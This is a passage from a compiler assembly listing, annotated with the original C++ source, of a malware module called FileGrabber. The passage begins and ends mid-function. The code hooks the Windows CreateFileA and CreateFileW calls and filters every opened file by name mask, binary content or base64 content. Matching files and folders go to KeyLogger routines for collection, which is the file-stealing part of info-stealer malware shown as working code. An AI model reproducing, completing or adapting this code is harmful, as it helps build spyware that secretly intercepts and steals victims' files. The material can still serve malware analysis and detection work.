  000a3	3b 43 04	 cmp	 eax, DWORD PTR [ebx+4]
  000a6	59		 pop	 ecx
  000a7	0f 8c dc 00 00
	00		 jl	 $LN58@SendEvent
  000ad	8b 4b 08	 mov	 ecx, DWORD PTR [ebx+8]
  000b0	3b c1		 cmp	 eax, ecx
  000b2	7e 08		 jle	 SHORT $LN32@SendEvent
  000b4	85 c9		 test	 ecx, ecx
  000b6	0f 8d cd 00 00
	00		 jge	 $LN58@SendEvent
$LN32@SendEvent:
; 208  : 				{	
; 209  : 					if( rv->maska || rv->aw & FILEISBIN || rv->ignoreBeg[0][0] )
  000bc	83 7b 0c 00	 cmp	 DWORD PTR [ebx+12], 0
  000c0	75 24		 jne	 SHORT $LN30@SendEvent
  000c2	8b 43 14	 mov	 eax, DWORD PTR [ebx+20]
  000c5	a8 10		 test	 al, 16			; 00000010H
  000c7	75 1d		 jne	 SHORT $LN30@SendEvent
  000c9	80 7b 1c 00	 cmp	 BYTE PTR [ebx+28], 0
  000cd	75 17		 jne	 SHORT $LN30@SendEvent
; 247  : 									break;
; 248  : 								}
; 249  : 							}	
; 250  : 						}
; 251  : 					}
; 252  : 					else
; 253  : 					{
; 254  : 						if( rv->aw & LOADFILE ) //
  000cf	a8 04		 test	 al, 4
  000d1	74 07		 je	 SHORT $LN17@SendEvent
; 255  : 							LoadFile(e);
  000d3	8b f7		 mov	 esi, edi
  000d5	e8 00 00 00 00	 call	 ?LoadFile@FileGrabber@@YA_NAAUParamEvent@1@@Z ; FileGrabber::LoadFile
$LN17@SendEvent:
; 256  : 						send = 5; //
  000da	c7 45 f8 05 00
	00 00		 mov	 DWORD PTR _send$66532[ebp], 5
  000e1	e9 a3 00 00 00	 jmp	 $LN58@SendEvent
$LN30@SendEvent:
; 210  : 					{
; 211  : 						if( LoadFile(e) )
  000e6	8b f7		 mov	 esi, edi
  000e8	e8 00 00 00 00	 call	 ?LoadFile@FileGrabber@@YA_NAAUParamEvent@1@@Z ; FileGrabber::LoadFile
  000ed	84 c0		 test	 al, al
  000ef	0f 84 94 00 00
	00		 je	 $LN58@SendEvent
; 212  : 						{
; 213  : 							if( !IsFormatBeg( e, rv ) ) //
  000f5	57		 push	 edi
  000f6	8b cb		 mov	 ecx, ebx
  000f8	e8 00 00 00 00	 call	 ?IsFormatBeg@FileGrabber@@YA_NABUParamEvent@1@PAUReceiver@1@@Z ; FileGrabber::IsFormatBeg
  000fd	59		 pop	 ecx
  000fe	84 c0		 test	 al, al
  00100	0f 85 83 00 00
	00		 jne	 $LN58@SendEvent
; 214  : 							{
; 215  : 								//
; 216  : 								bool filters = false; //
  00106	88 45 ff	 mov	 BYTE PTR _filters$66555[ebp], al
; 217  : 								for(;;)
; 218  : 								{
; 219  : 									//
; 220  : 									if( rv->maska )
  00109	8b 43 0c	 mov	 eax, DWORD PTR [ebx+12]
  0010c	85 c0		 test	 eax, eax
  0010e	74 1f		 je	 SHORT $LN56@SendEvent
; 221  : 									{
; 222  : 										filters = true;
; 223  : 										if( WildCmp( (char*)e.data, rv->maska ) )
  00110	50		 push	 eax
  00111	ff b7 18 02 00
	00		 push	 DWORD PTR [edi+536]
  00117	c6 45 ff 01	 mov	 BYTE PTR _filters$66555[ebp], 1
  0011b	e8 00 00 00 00	 call	 ?WildCmp@@YA_NPBD0@Z	; WildCmp
  00120	59		 pop	 ecx
  00121	59		 pop	 ecx
  00122	84 c0		 test	 al, al
  00124	74 09		 je	 SHORT $LN56@SendEvent
; 224  : 										{
; 225  : 											send = 2; break;
  00126	c7 45 f8 02 00
	00 00		 mov	 DWORD PTR _send$66532[ebp], 2
  0012d	eb 5a		 jmp	 SHORT $LN58@SendEvent
$LN56@SendEvent:
; 226  : 										}
; 227  : 									}
; 228  : 	
; 229  : 									if( rv->aw & FILEISBIN )
  0012f	f6 43 14 10	 test	 BYTE PTR [ebx+20], 16	; 00000010H
  00133	74 24		 je	 SHORT $LN57@SendEvent
; 230  : 									{
; 231  : 										filters = true;
; 232  : 										if( IsBin( (BYTE*)e.data, e.szData ) )
  00135	ff b7 1c 02 00
	00		 push	 DWORD PTR [edi+540]
  0013b	c6 45 ff 01	 mov	 BYTE PTR _filters$66555[ebp], 1
  0013f	ff b7 18 02 00
	00		 push	 DWORD PTR [edi+536]
  00145	e8 00 00 00 00	 call	 ?IsBin@FileGrabber@@YA_NPAEH@Z ; FileGrabber::IsBin
  0014a	59		 pop	 ecx
  0014b	59		 pop	 ecx
  0014c	84 c0		 test	 al, al
  0014e	74 09		 je	 SHORT $LN57@SendEvent
; 233  : 										{
; 234  : 											send = 3; break;
  00150	c7 45 f8 03 00
	00 00		 mov	 DWORD PTR _send$66532[ebp], 3
  00157	eb 30		 jmp	 SHORT $LN58@SendEvent
$LN57@SendEvent:
; 235  : 										}
; 236  : 									}
; 237  : 		
; 238  : 									if( rv->aw & FILEISBASE64 )
  00159	f6 43 14 40	 test	 BYTE PTR [ebx+20], 64	; 00000040H
  0015d	74 20		 je	 SHORT $LN20@SendEvent
; 239  : 									{
; 240  : 										filters = true;
; 241  : 										if( IsBase64( (BYTE*)e.data, e.szData ) )
  0015f	ff b7 1c 02 00
	00		 push	 DWORD PTR [edi+540]
  00165	ff b7 18 02 00
	00		 push	 DWORD PTR [edi+536]
  0016b	e8 00 00 00 00	 call	 ?IsBase64@FileGrabber@@YA_NPAEH@Z ; FileGrabber::IsBase64
  00170	59		 pop	 ecx
  00171	59		 pop	 ecx
  00172	84 c0		 test	 al, al
  00174	74 0f		 je	 SHORT $LN55@SendEvent
; 242  : 										{
; 243  : 											send = 4; break;
  00176	c7 45 f8 04 00
	00 00		 mov	 DWORD PTR _send$66532[ebp], 4
  0017d	eb 0a		 jmp	 SHORT $LN58@SendEvent
$LN20@SendEvent:
; 244  : 										}
; 245  : 									}
; 246  : 									if( filters ) send = 0; //
  0017f	80 7d ff 00	 cmp	 BYTE PTR _filters$66555[ebp], 0
  00183	74 04		 je	 SHORT $LN58@SendEvent
$LN55@SendEvent:
  00185	83 65 f8 00	 and	 DWORD PTR _send$66532[ebp], 0
$LN58@SendEvent:
; 257  : 					}
; 258  : 				}
; 259  : 			}
; 260  : 			if( rv->FuncReceiver && send > 0 )
  00189	83 7b 18 00	 cmp	 DWORD PTR [ebx+24], 0
  0018d	0f 84 3f 01 00
	00		 je	 $LN40@SendEvent
  00193	83 7d f8 00	 cmp	 DWORD PTR _send$66532[ebp], 0
  00197	0f 8e 35 01 00
	00		 jle	 $LN40@SendEvent
; 261  : 			{
; 262  : 				e.nameSend[0] = 0;
; 263  : 				if( e.unicode )
  0019d	80 bf 14 02 00
	00 00		 cmp	 BYTE PTR [edi+532], 0
  001a4	c6 87 28 02 00
	00 00		 mov	 BYTE PTR [edi+552], 0
  001ab	74 12		 je	 SHORT $LN15@SendEvent
; 264  : 				{
; 265  : 					DBG("FileGrabberW", "
 '%ls'(%d), size: %d", e.fileNameW, send, e.szData );
; 266  : 					e.fileName = WSTR::ToAnsi( e.fileNameW, 0 );
  001ad	6a 00		 push	 0
  001af	57		 push	 edi
  001b0	e8 00 00 00 00	 call	 ?ToAnsi@WSTR@@YAPADPB_WK@Z ; WSTR::ToAnsi
  001b5	59		 pop	 ecx
  001b6	59		 pop	 ecx
  001b7	89 87 08 02 00
	00		 mov	 DWORD PTR [edi+520], eax
; 267  : 				}
; 268  : 				else
  001bd	eb 06		 jmp	 SHORT $LN14@SendEvent
$LN15@SendEvent:
; 269  : 				{
; 270  : 					DBG("FileGrabberA", "
 '%s'(%d), size: %d", e.fileNameA, send, e.szData );
; 271  : 					e.fileName = (char*)e.fileNameA;
  001bf	89 bf 08 02 00
	00		 mov	 DWORD PTR [edi+520], edi
$LN14@SendEvent:
; 272  : 				}
; 273  : 
; 274  : 				e.shortName = File::ExtractFileNameA( e.fileName, false );
  001c5	6a 00		 push	 0
  001c7	ff b7 08 02 00
	00		 push	 DWORD PTR [edi+520]
  001cd	e8 00 00 00 00	 call	 ?ExtractFileNameA@File@@YAPADPAD_N@Z ; File::ExtractFileNameA
; 275  : 				//
; 276  : 				e.extFile = 0;
; 277  : 				const char* p = STR::ScanEnd( (char*)e.shortName, '.' ); 
  001d2	6a 2e		 push	 46			; 0000002eH
  001d4	8d b7 10 02 00
	00		 lea	 esi, DWORD PTR [edi+528]
  001da	83 26 00	 and	 DWORD PTR [esi], 0
  001dd	50		 push	 eax
  001de	89 87 0c 02 00
	00		 mov	 DWORD PTR [edi+524], eax
  001e4	e8 00 00 00 00	 call	 ?ScanEnd@STR@@YAPADPADD@Z ; STR::ScanEnd
  001e9	83 c4 10	 add	 esp, 16			; 00000010H
; 278  : 				if( p ) e.extFile = p + 1; 
  001ec	85 c0		 test	 eax, eax
  001ee	74 03		 je	 SHORT $LN13@SendEvent
  001f0	40		 inc	 eax
  001f1	89 06		 mov	 DWORD PTR [esi], eax
$LN13@SendEvent:
; 279  : 
; 280  : 				int res = rv->FuncReceiver(&e);
  001f3	57		 push	 edi
  001f4	ff 53 18	 call	 DWORD PTR [ebx+24]
  001f7	59		 pop	 ecx
  001f8	8b c8		 mov	 ecx, eax
  001fa	89 4d f8	 mov	 DWORD PTR _res$66606[ebp], ecx
; 281  : 
; 282  : 				if( res & SENDFILE ) //
 SENDFILE, 
  001fd	f6 c1 08	 test	 cl, 8
  00200	74 4d		 je	 SHORT $LN12@SendEvent
; 283  : 				{
; 284  : 					if( e.data )
  00202	8b b7 18 02 00
	00		 mov	 esi, DWORD PTR [edi+536]
  00208	85 f6		 test	 esi, esi
  0020a	0f 84 a4 00 00
	00		 je	 $LN4@SendEvent
; 285  : 					{
; 286  : 						const char* nameSend = "FileGrabber";
  00210	b8 00 00 00 00	 mov	 eax, OFFSET ??_C@_0M@BHANHMDL@FileGrabber?$AA@
; 287  : 						if( res & CURRNAMEFILE ) //
  00215	f6 c1 20	 test	 cl, 32			; 00000020H
  00218	74 08		 je	 SHORT $LN10@SendEvent
; 288  : 							nameSend = e.shortName;
  0021a	8b 87 0c 02 00
	00		 mov	 eax, DWORD PTR [edi+524]
; 289  : 						else
  00220	eb 19		 jmp	 SHORT $LN6@SendEvent
$LN10@SendEvent:
; 290  : 							if( res & CURRFULLNAMEFILE ) //
  00222	84 c9		 test	 cl, cl
  00224	79 08		 jns	 SHORT $LN8@SendEvent
; 291  : 								nameSend = e.fileName;
  00226	8b 87 08 02 00
	00		 mov	 eax, DWORD PTR [edi+520]
; 292  : 							else
  0022c	eb 0d		 jmp	 SHORT $LN6@SendEvent
$LN8@SendEvent:
; 293  : 								if( e.nameSend[0] ) //
  0022e	8d 8f 28 02 00
	00		 lea	 ecx, DWORD PTR [edi+552]
  00234	80 39 00	 cmp	 BYTE PTR [ecx], 0
  00237	74 02		 je	 SHORT $LN6@SendEvent
; 294  : 									nameSend = e.nameSend;
  00239	8b c1		 mov	 eax, ecx
$LN6@SendEvent:
; 295  : 						DBG( "FileGrabber", "
 '%s' 
 '%s'", e.fileName, nameSend );
; 296  : 						KeyLogger::AddFile( 0, (char*)nameSend, e.data, e.szData );
  0023b	ff b7 1c 02 00
	00		 push	 DWORD PTR [edi+540]
  00241	56		 push	 esi
  00242	50		 push	 eax
  00243	6a 00		 push	 0
  00245	e8 00 00 00 00	 call	 ?AddFile@KeyLogger@@YAXPAD0PAXK@Z ; KeyLogger::AddFile
  0024a	83 c4 10	 add	 esp, 16			; 00000010H
; 297  : 					}
; 298  : 				}
; 299  : 				else 
  0024d	eb 65		 jmp	 SHORT $LN4@SendEvent
$LN12@SendEvent:
; 300  : 					if( res & SENDFOLDER )
  0024f	f7 c1 00 01 00
	00		 test	 ecx, 256		; 00000100H
  00255	74 5d		 je	 SHORT $LN4@SendEvent
; 301  : 					{
; 302  : 						pPathRemoveFileSpecA(e.fileName);
  00257	ff b7 08 02 00
	00		 push	 DWORD PTR [edi+520]
  0025d	e8 00 00 00 00	 call	 ??$pushargEx@$0BD@$0OGODOOAB@$0CBF@PAD@@YAPAXPAD@Z ; pushargEx<19,3873697281,533,char *>
  00262	59		 pop	 ecx
; 303  : 						//
 PathRemoveFileSpec 
; 304  : 						int sz = m_lstrlen(e.fileName);
  00263	ff b7 08 02 00
	00		 push	 DWORD PTR [edi+520]
  00269	e8 00 00 00 00	 call	 ?m_lstrlen@@YGKPBD@Z	; m_lstrlen
; 305  : 						if( e.fileName[sz - 1] != '\\' )
  0026e	8b 8f 08 02 00
	00		 mov	 ecx, DWORD PTR [edi+520]
  00274	03 c8		 add	 ecx, eax
  00276	80 79 ff 5c	 cmp	 BYTE PTR [ecx-1], 92	; 0000005cH
  0027a	74 0e		 je	 SHORT $LN3@SendEvent
; 306  : 						{
; 307  : 							e.fileName[sz] = '\\';
  0027c	c6 01 5c	 mov	 BYTE PTR [ecx], 92	; 0000005cH
; 308  : 							e.fileName[sz + 1] = 0;
  0027f	8b 8f 08 02 00
	00		 mov	 ecx, DWORD PTR [edi+520]
  00285	c6 44 01 01 00	 mov	 BYTE PTR [ecx+eax+1], 0
$LN3@SendEvent:
; 309  : 							sz++;
; 310  : 						}
; 311  : 						DBG( "FileGrabber", "
 '%s' 
 '%s'", e.fileName, e.nameSend );
; 312  : 						int currState = stateGrabber;
  0028a	8b 35 00 00 00
	00		 mov	 esi, DWORD PTR ?stateGrabber@FileGrabber@@3HA ; FileGrabber::stateGrabber
; 313  : 						stateGrabber |= IGNOREHOOK; //
  00290	81 0d 00 00 00
	00 00 02 00 00	 or	 DWORD PTR ?stateGrabber@FileGrabber@@3HA, 512 ; FileGrabber::stateGrabber, 00000200H
; 314  : 						KeyLogger::AddDirectory( e.fileName, e.nameSend );
  0029a	8d 87 28 02 00
	00		 lea	 eax, DWORD PTR [edi+552]
  002a0	50		 push	 eax
  002a1	ff b7 08 02 00
	00		 push	 DWORD PTR [edi+520]
  002a7	e8 00 00 00 00	 call	 ?AddDirectory@KeyLogger@@YAXPAD0@Z ; KeyLogger::AddDirectory
  002ac	59		 pop	 ecx
  002ad	59		 pop	 ecx
; 315  : 						stateGrabber = currState; //
  002ae	89 35 00 00 00
	00		 mov	 DWORD PTR ?stateGrabber@FileGrabber@@3HA, esi ; FileGrabber::stateGrabber
$LN4@SendEvent:
; 316  : 					}
; 317  : 				if( res & STOPRECEIVER )
  002b4	f7 45 f8 00 08
	00 00		 test	 DWORD PTR _res$66606[ebp], 2048 ; 00000800H
  002bb	74 04		 je	 SHORT $LN2@SendEvent
; 318  : 					rv->ignore = true;
  002bd	c6 43 34 01	 mov	 BYTE PTR [ebx+52], 1
$LN2@SendEvent:
; 319  : 				if( e.fileName != e.fileNameA ) //
  002c1	8b 87 08 02 00
	00		 mov	 eax, DWORD PTR [edi+520]
  002c7	3b c7		 cmp	 eax, edi
  002c9	74 07		 je	 SHORT $LN40@SendEvent
; 320  : 					STR::Free(e.fileName);
  002cb	50		 push	 eax
  002cc	e8 00 00 00 00	 call	 ?Free@STR@@YAXPAD@Z	; STR::Free
  002d1	59		 pop	 ecx
$LN40@SendEvent:
  002d2	ff 45 f4	 inc	 DWORD PTR _i$66525[ebp]
  002d5	8b 45 f4	 mov	 eax, DWORD PTR _i$66525[ebp]
  002d8	3b 45 f0	 cmp	 eax, DWORD PTR _count$[ebp]
  002db	0f 8c 4e fd ff
	ff		 jl	 $LL61@SendEvent
  002e1	5e		 pop	 esi
  002e2	5b		 pop	 ebx
$LN39@SendEvent:
; 321  : 			}
; 322  : 		}
; 323  : 	}
; 324  : 	MemFree(e.data);
  002e3	81 c7 18 02 00
	00		 add	 edi, 536		; 00000218H
  002e9	ff 37		 push	 DWORD PTR [edi]
  002eb	e8 00 00 00 00	 call	 ?MemFree@@YAXPAX@Z	; MemFree
; 325  : 	e.data = 0;
  002f0	83 27 00	 and	 DWORD PTR [edi], 0
  002f3	59		 pop	 ecx
  002f4	5f		 pop	 edi
$LN43@SendEvent:
; 326  : }
  002f5	c9		 leave
  002f6	c3		 ret	 0
?SendEvent@FileGrabber@@YAXAAUParamEvent@1@@Z ENDP	; FileGrabber::SendEvent
_TEXT	ENDS
PUBLIC	?Hook_CreateFileA@FileGrabber@@YGPAXPBDKKPAU_SECURITY_ATTRIBUTES@@KKPAX@Z ; FileGrabber::Hook_CreateFileA
EXTRN	?m_lstrcpy@@YGXPADPBD@Z:PROC			; m_lstrcpy
; Function compile flags: /Ogspy
;	COMDAT ?Hook_CreateFileA@FileGrabber@@YGPAXPBDKKPAU_SECURITY_ATTRIBUTES@@KKPAX@Z
_TEXT	SEGMENT
_e$66664 = -812						; size = 812
_lpFileName$ = 8					; size = 4
_dwDesiredAccess$ = 12					; size = 4
_dwShareMode$ = 16					; size = 4
_lpSecurityAttributes$ = 20				; size = 4
_dwCreationDisposition$ = 24				; size = 4
_dwFlagsAndAttributes$ = 28				; size = 4
_hTemplateFile$ = 32					; size = 4
?Hook_CreateFileA@FileGrabber@@YGPAXPBDKKPAU_SECURITY_ATTRIBUTES@@KKPAX@Z PROC ; FileGrabber::Hook_CreateFileA, COMDAT
; 329  : {
  00000	55		 push	 ebp
  00001	8b ec		 mov	 ebp, esp
  00003	81 ec 2c 03 00
	00		 sub	 esp, 812		; 0000032cH
  00009	53		 push	 ebx
; 330  : 	HANDLE File = Real_CreateFileA(lpFileName, dwDesiredAccess, dwShareMode, lpSecurityAttributes, dwCreationDisposition, dwFlagsAndAttributes, hTemplateFile );
  0000a	8b 5d 0c	 mov	 ebx, DWORD PTR _dwDesiredAccess$[ebp]
  0000d	56		 push	 esi
  0000e	8b 75 08	 mov	 esi, DWORD PTR _lpFileName$[ebp]
  00011	57		 push	 edi
  00012	ff 75 20	 push	 DWORD PTR _hTemplateFile$[ebp]
  00015	ff 75 1c	 push	 DWORD PTR _dwFlagsAndAttributes$[ebp]
  00018	ff 75 18	 push	 DWORD PTR _dwCreationDisposition$[ebp]
  0001b	ff 75 14	 push	 DWORD PTR _lpSecurityAttributes$[ebp]
  0001e	ff 75 10	 push	 DWORD PTR _dwShareMode$[ebp]
  00021	53		 push	 ebx
  00022	56		 push	 esi
  00023	ff 15 00 00 00
	00		 call	 DWORD PTR ?Real_CreateFileA@FileGrabber@@3P6GPAXPBDKKPAU_SECURITY_ATTRIBUTES@@KKPAX@ZA ; FileGrabber::Real_CreateFileA
; 331  : 	if( (stateGrabber & IGNOREHOOK) == 0 && (dwFlagsAndAttributes & FILE_FLAG_OVERLAPPED) == 0 && lpFileName && lpFileName[0] != '/' && lpFileName[0] != '\\' ) //
  00029	f7 05 00 00 00
	00 00 02 00 00	 test	 DWORD PTR ?stateGrabber@FileGrabber@@3HA, 512 ; FileGrabber::stateGrabber, 00000200H
  00033	8b f8		 mov	 edi, eax
  00035	75 52		 jne	 SHORT $LN1@Hook_Creat
  00037	f7 45 1c 00 00
	00 40		 test	 DWORD PTR _dwFlagsAndAttributes$[ebp], 1073741824 ; 40000000H
  0003e	75 49		 jne	 SHORT $LN1@Hook_Creat
  00040	85 f6		 test	 esi, esi
  00042	74 45		 je	 SHORT $LN1@Hook_Creat
  00044	8a 06		 mov	 al, BYTE PTR [esi]
  00046	3c 2f		 cmp	 al, 47			; 0000002fH
  00048	74 3f		 je	 SHORT $LN1@Hook_Creat
  0004a	3c 5c		 cmp	 al, 92			; 0000005cH
  0004c	74 3b		 je	 SHORT $LN1@Hook_Creat
; 332  : 	{
; 333  : 	//DBG("FileGrabberA", "%s", lpFileName);
; 334  : 		//
; 335  : 		ParamEvent e;
; 336  : 		e.data = 0;
  0004e	83 a5 ec fe ff
	ff 00		 and	 DWORD PTR _e$66664[ebp+536], 0
; 337  : 		e.szData = 0;
  00055	83 a5 f0 fe ff
	ff 00		 and	 DWORD PTR _e$66664[ebp+540], 0
; 338  : 		m_lstrcpy( e.fileNameA, lpFileName );
  0005c	56		 push	 esi
  0005d	8d 85 d4 fc ff
	ff		 lea	 eax, DWORD PTR _e$66664[ebp]
  00063	50		 push	 eax
  00064	e8 00 00 00 00	 call	 ?m_lstrcpy@@YGXPADPBD@Z	; m_lstrcpy
; 339  : 		e.unicode = false;
; 340  : 		e.access = dwDesiredAccess;
; 341  : 		e.file = File;
; 342  : 		SendEvent(e); //
  00069	8d 85 d4 fc ff
	ff		 lea	 eax, DWORD PTR _e$66664[ebp]
  0006f	50		 push	 eax
  00070	c6 85 e8 fe ff
	ff 00		 mov	 BYTE PTR _e$66664[ebp+532], 0
  00077	89 9d f4 fe ff
	ff		 mov	 DWORD PTR _e$66664[ebp+544], ebx
  0007d	89 bd f8 fe ff
	ff		 mov	 DWORD PTR _e$66664[ebp+548], edi
  00083	e8 00 00 00 00	 call	 ?SendEvent@FileGrabber@@YAXAAUParamEvent@1@@Z ; FileGrabber::SendEvent
  00088	59		 pop	 ecx
$LN1@Hook_Creat:
; 343  : 	}
; 344  : 	return File;
  00089	8b c7		 mov	 eax, edi
  0008b	5f		 pop	 edi
  0008c	5e		 pop	 esi
  0008d	5b		 pop	 ebx
; 345  : }
  0008e	c9		 leave
  0008f	c2 1c 00	 ret	 28			; 0000001cH
?Hook_CreateFileA@FileGrabber@@YGPAXPBDKKPAU_SECURITY_ATTRIBUTES@@KKPAX@Z ENDP ; FileGrabber::Hook_CreateFileA
_TEXT	ENDS
PUBLIC	?Hook_CreateFileW@FileGrabber@@YGPAXPB_WKKPAU_SECURITY_ATTRIBUTES@@KKPAX@Z ; FileGrabber::Hook_CreateFileW
EXTRN	?m_wcslen@@YGKPB_W@Z:PROC			; m_wcslen
; Function compile flags: /Ogspy
;	COMDAT ?Hook_CreateFileW@FileGrabber@@YGPAXPB_WKKPAU_SECURITY_ATTRIBUTES@@KKPAX@Z
_TEXT	SEGMENT
_e$66676 = -812						; size = 812
_lpFileName$ = 8					; size = 4
_dwDesiredAccess$ = 12					; size = 4
_dwShareMode$ = 16					; size = 4
_lpSecurityAttributes$ = 20				; size = 4
_dwCreationDisposition$ = 24				; size = 4
_dwFlagsAndAttributes$ = 28				; size = 4
_hTemplateFile$ = 32					; size = 4
?Hook_CreateFileW@FileGrabber@@YGPAXPB_WKKPAU_SECURITY_ATTRIBUTES@@KKPAX@Z PROC ; FileGrabber::Hook_CreateFileW, COMDAT
; 348  : {
  00000	55		 push	 ebp
  00001	8b ec		 mov	 ebp, esp
  00003	81 ec 2c 03 00
	00		 sub	 esp, 812		; 0000032cH
  00009	53		 push	 ebx
; 349  : 	HANDLE File = Real_CreateFileW(lpFileName, dwDesiredAccess, dwShareMode, lpSecurityAttributes, dwCreationDisposition, dwFlagsAndAttributes, hTemplateFile );
  0000a	8b 5d 0c	 mov	 ebx, DWORD PTR _dwDesiredAccess$[ebp]
  0000d	56		 push	 esi
  0000e	8b 75 08	 mov	 esi, DWORD PTR _lpFileName$[ebp]
  00011	57		 push	 edi
  00012	ff 75 20	 push	 DWORD PTR _hTemplateFile$[ebp]
  00015	ff 75 1c	 push	 DWORD PTR _dwFlagsAndAttributes$[ebp]
  00018	ff 75 18	 push	 DWORD PTR _dwCreationDisposition$[ebp]
  0001b	ff 75 14	 push	 DWORD PTR _lpSecurityAttributes$[ebp]
  0001e	ff 75 10	 push	 DWORD PTR _dwShareMode$[ebp]
  00021	53		 push	 ebx
  00022	56		 push	 esi
  00023	ff 15 00 00 00
	00		 call	 DWORD PTR ?Real_CreateFileW@FileGrabber@@3P6GPAXPB_WKKPAU_SECURITY_ATTRIBUTES@@KKPAX@ZA ; FileGrabber::Real_CreateFileW
; 350  : 
; 351  : 	if( (stateGrabber & (IGNOREHOOK | INHOOK)) == 0 && (dwFlagsAndAttributes & FILE_FLAG_OVERLAPPED) == 0 && lpFileName && lpFileName[0] != '/' && lpFileName[0] != '\\' ) //
  00029	f7 05 00 00 00
	00 00 06 00 00	 test	 DWORD PTR ?stateGrabber@FileGrabber@@3HA, 1536 ; FileGrabber::stateGrabber, 00000600H
  00033	8b f8		 mov	 edi, eax
  00035	75 64		 jne	 SHORT $LN1@Hook_Creat@2
  00037	f7 45 1c 00 00
	00 40		 test	 DWORD PTR _dwFlagsAndAttributes$[ebp], 1073741824 ; 40000000H
  0003e	75 5b		 jne	 SHORT $LN1@Hook_Creat@2
  00040	85 f6		 test	 esi, esi
  00042	74 57		 je	 SHORT $LN1@Hook_Creat@2
  00044	0f b7 06	 movzx	 eax, WORD PTR [esi]
  00047	66 83 f8 2f	 cmp	 ax, 47			; 0000002fH
  0004b	74 4e		 je	 SHORT $LN1@Hook_Creat@2
  0004d	66 83 f8 5c	 cmp	 ax, 92			; 0000005cH
  00051	74 48		 je	 SHORT $LN1@Hook_Creat@2
; 352  : 	{
; 353  : 		//stateGrabber |= INHOOK;
; 354  : 		//
; 355  : 		ParamEvent e;
; 356  : 		e.data = 0;
  00053	83 a5 ec fe ff
	ff 00		 and	 DWORD PTR _e$66676[ebp+536], 0
; 357  : 		e.szData = 0;
  0005a	83 a5 f0 fe ff
	ff 00		 and	 DWORD PTR _e$66676[ebp+540], 0
; 358  : 		int len = m_wcslen(lpFileName);
  00061	56		 push	 esi
  00062	e8 00 00 00 00	 call	 ?m_wcslen@@YGKPB_W@Z	; m_wcslen
; 359  : 		m_memcpy( e.fileNameW, lpFileName, sizeof(WCHAR) * (len + 1) );
  00067	8d 44 00 02	 lea	 eax, DWORD PTR [eax+eax+2]
  0006b	50		 push	 eax
  0006c	8d 85 d4 fc ff
	ff		 lea	 eax, DWORD PTR _e$66676[ebp]
  00072	56		 push	 esi
  00073	50		 push	 eax
  00074	e8 00 00 00 00	 call	 ?m_memcpy@@YAPAXPAXPBXH@Z ; m_memcpy
; 360  : 		e.unicode = true;
; 361  : 		e.access = dwDesiredAccess;
; 362  : 		e.file = File;
; 363  : 
; 364  : 	   	SendEvent(e); //
  00079	8d 85 d4 fc ff
	ff		 lea	 eax, DWORD PTR _e$66676[ebp]
  0007f	50		 push	 eax
  00080	c6 85 e8 fe ff
	ff 01		 mov	 BYTE PTR _e$66676[ebp+532], 1
  00087	89 9d f4 fe ff
	ff		 mov	 DWORD PTR _e$66676[ebp+544], ebx
  0008d	89 bd f8 fe ff
	ff		 mov	 DWORD PTR _e$66676[ebp+548], edi
  00093	e8 00 00 00 00	 call	 ?SendEvent@FileGrabber@@YAXAAUParamEvent@1@@Z ; FileGrabber::SendEvent
  00098	83 c4 10	 add	 esp, 16			; 00000010H
$LN1@Hook_Creat@2:
; 365  : 		//stateGrabber &= ~INHOOK;
; 366  : 	}
; 367  : 	return File;
  0009b	8b c7		 mov	 eax, edi
  0009d	5f		 pop	 edi
  0009e	5e		 pop	 esi
  0009f	5b		 pop	 ebx
; 368  : }
  000a0	c9		 leave
  000a1	c2 1c 00	 ret	 28			; 0000001cH
?Hook_CreateFileW@FileGrabber@@YGPAXPB_WKKPAU_SECURITY_ATTRIBUTES@@KKPAX@Z ENDP ; FileGrabber::Hook_CreateFileW
_TEXT	ENDS
PUBLIC	?Init@FileGrabber@@YA_NH@Z			; FileGrabber::Init
EXTRN	?HookApi@@YAPAXKKPAX0@Z:PROC			; HookApi
EXTRN	?SetFreeItemMehod@List@@YAXPAXP6AX0@Z@Z:PROC	; List::SetFreeItemMehod
EXTRN	?Create@List@@YAPAXXZ:PROC			; List::Create
EXTRN	?IsNewProcess@@YA_NAAKPAK@Z:PROC		; IsNewProcess
; Function compile flags: /Ogspy
;	COMDAT ?Init@FileGrabber@@YA_NH@Z
_TEXT	SEGMENT
_flags$ = 8						; size = 4
?Init@FileGrabber@@YA_NH@Z PROC				; FileGrabber::Init, COMDAT
; 381  : 	if( !IsNewProcess(PID) ) //
  00000	6a 00		 push	 0
  00002	68 00 00 00 00	 push	 OFFSET ?PID@FileGrabber@@3KA ; FileGrabber::PID
  00007	e8 00 00 00 00	 call	 ?IsNewProcess@@YA_NAAKPAK@Z ; IsNewProcess
  0000c	59		 pop	 ecx
  0000d	59		 pop	 ecx
  0000e	84 c0		 test	 al, al
; 382  : 		return true; //
  00010	74 6d		 je	 SHORT $LN9@Init
; 383  : 	receivers = List::Create();
  00012	e8 00 00 00 00	 call	 ?Create@List@@YAPAXXZ	; List::Create
  00017	a3 00 00 00 00	 mov	 DWORD PTR ?receivers@FileGrabber@@3PAXA, eax ; FileGrabber::receivers
; 384  : 	if( !receivers )
  0001c	85 c0		 test	 eax, eax
  0001e	75 03		 jne	 SHORT $LN5@Init
$LN10@Init:
; 385  : 		return false;
  00020	32 c0		 xor	 al, al
; 399  : }
  00022	c3		 ret	 0
$LN5@Init:
; 386  : 	List::SetFreeItemMehod( receivers, DelReceiver ); //
  00023	68 00 00 00 00	 push	 OFFSET ?DelReceiver@FileGrabber@@YAXPAX@Z ; FileGrabber::DelReceiver
  00028	50		 push	 eax
  00029	e8 00 00 00 00	 call	 ?SetFreeItemMehod@List@@YAXPAXP6AX0@Z@Z ; List::SetFreeItemMehod
; 387  : 	if( flags & CREATEFILEA )
  0002e	f6 44 24 0c 01	 test	 BYTE PTR _flags$[esp+4], 1
  00033	59		 pop	 ecx
  00034	59		 pop	 ecx
  00035	74 1d		 je	 SHORT $LN3@Init
; 388  : 	{
; 389  : 		if (!HookApi(DLL_KERNEL32, Hash_CreateFileA, &Hook_CreateFileA, &Real_CreateFileA ) )
  00037	68 00 00 00 00	 push	 OFFSET ?Real_CreateFileA@FileGrabber@@3P6GPAXPBDKKPAU_SECURITY_ATTRIBUTES@@KKPAX@ZA ; FileGrabber::Real_CreateFileA
  0003c	68 00 00 00 00	 push	 OFFSET ?Hook_CreateFileA@FileGrabber@@YGPAXPBDKKPAU_SECURITY_ATTRIBUTES@@KKPAX@Z ; FileGrabber::Hook_CreateFileA
  00041	68 14 f1 f8 08	 push	 150532372		; 08f8f114H
  00046	6a 01		 push	 1
  00048	e8 00 00 00 00	 call	 ?HookApi@@YAPAXKKPAX0@Z	; HookApi
